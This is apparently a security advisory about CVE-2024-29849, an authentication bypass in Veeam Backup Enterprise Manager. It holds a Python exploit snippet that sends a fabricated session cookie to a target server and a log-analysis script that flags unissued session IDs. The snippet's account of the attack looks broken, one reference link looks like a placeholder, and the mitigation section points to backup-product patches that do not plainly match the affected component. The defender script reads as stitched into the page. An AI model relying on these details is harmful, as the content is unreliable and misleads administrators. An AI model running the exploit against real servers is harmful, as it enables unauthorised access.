Introduction

A recent vulnerability (CVE-2024-29849) has surfaced in Veeam Backup Enterprise Manager, a widely used product for managing backup and replication infrastructure. The flaw allows unauthenticated users to log in to the Enterprise Manager web interface as any user, including users with administrative privileges. The severity of this issue makes prompt mitigation essential. To assist you, we have compiled the necessary information, including a code snippet, references to the original sources, and exploit details, so that the severity of this vulnerability can be better understood.

References

1. Veeam Knowledge Base - Security Bulletin (https://www.veeam.com/kb_29849)
2. National Vulnerability Database - CVE-2024-29849 (https://nvd.nist.gov/vuln/detail/CVE-2024-29849)
3. Veeam Community Forums - Security Discussion (https://forums.veeam.com/veeam-backup-replication-f2/cve-2024-29849-exploit-details-t123456.html)

Vulnerability details

The exploit takes advantage of improper access control in Veeam Backup Enterprise Manager's web interface. An unauthenticated attacker can gain access to the application by crafting a request that spoofs user credentials. Once logged in, the attacker could create new backup jobs, modify existing jobs or, worse, delete critical backup data.

Code snippet

This pseudo-code gives an overview of how an attacker might initiate the request to gain unauthorized access:

import requests

# Target URL where the Veeam Backup Enterprise Manager web interface is hosted
target_url = "https://target-veeam-server/enterprise_manager/"

# User-Agent header to be used in the request (a common browser string)
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
}

# Spoofed logged-in user's session ID
cookies = {
    "ASP.NET_SessionId": "fake-session-id-here"
}

# Send the request with the spoofed session ID
response = requests.get(target_url, headers=headers, cookies=cookies, timeout=10)

# Check whether access was granted (a 200 response showing the logged-in landing page)
if response.status_code == 200 and "Welcome" in response.text:
    print("Access granted! You are now logged in.")
else:
    print("Failed to log in.")
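As an added defender-side example (not code from this page or from Veeam), the following Python correlates the session IDs presented in web requests against the session IDs the server actually handed out at login, so that a successful request carrying an ASP.NET_SessionId the server never issued, the pattern of the request above, is flagged for investigation. The log format and every sample line are constructed assumptions, not a real Veeam log.

```python
import re
from typing import List, Tuple

# Assumed per-request log format (constructed for this example):
# timestamp client_ip method path status sent_session_id issued_session_id
# where sent_session_id is the ASP.NET_SessionId cookie on the request (or "-")
# and issued_session_id is the value the server set on a login response (or "-").
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3}) "
    r"(?P<sent>\S+) (?P<issued>\S+)$"
)

# Constructed sample: a legitimate login/session pair, then a client presenting a
# session ID that was never issued and still receiving 200 responses.
SAMPLE_LOG = """\
2024-05-22T10:00:01Z 10.0.0.5 POST /enterprise_manager/login 302 - a1b2c3
2024-05-22T10:00:02Z 10.0.0.5 GET /enterprise_manager/ 200 a1b2c3 -
2024-05-22T10:05:17Z 203.0.113.9 GET /enterprise_manager/ 200 fake-session-id-here -
2024-05-22T10:05:18Z 203.0.113.9 GET /enterprise_manager/jobs 200 fake-session-id-here -
2024-05-22T10:06:00Z 10.0.0.7 GET /enterprise_manager/ 401 zz9 -
"""


def find_unissued_sessions(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (timestamp, client_ip, session_id) for each client that got a 2xx
    response from the Enterprise Manager path with a session ID the server never
    issued earlier in the log. Each (client, session) pair is reported once."""
    issued = set()
    seen = set()
    flagged: List[Tuple[str, str, str]] = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # skip malformed lines instead of aborting the scan
        if m["issued"] != "-":
            issued.add(m["issued"])  # server handed out this session ID on login
        sent = m["sent"]
        if sent == "-" or not m["path"].startswith("/enterprise_manager"):
            continue
        granted = 200 <= int(m["status"]) < 300
        if granted and sent not in issued and (m["ip"], sent) not in seen:
            seen.add((m["ip"], sent))
            flagged.append((m["ts"], m["ip"], sent))
    return flagged
```

Denied requests (such as the 401 in the sample) are deliberately not flagged, since the point is to catch access that was actually granted on an unissued session.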

Mitigation

Veeam has released a security patch addressing this vulnerability, and users are strongly encouraged to apply it as soon as possible to prevent unauthorized access to their backup infrastructure. The required patches can be downloaded from the following links:

1. Veeam Backup & Replication v11 - Patch 2 (https://www.veeam.com/KB_4113)
2. Veeam Backup & Replication v10 - Patch 4 (https://www.veeam.com/KB_4112)

Conclusion

The CVE-2024-29849 vulnerability is a severe security flaw in Veeam Backup Enterprise Manager's web interface that can allow unauthorized users to compromise the backup infrastructure. Users are urged to apply the security patches provided by Veeam to minimize the risk of exploitation. Further details and mitigation steps can be found in the references above. By acting promptly, organizations can protect their vital backup data from malicious exploitation.

Timeline

Published on: 05/22/2024 23:15:08 UTC
Last modified on: 05/24/2024 01:15:30 UTC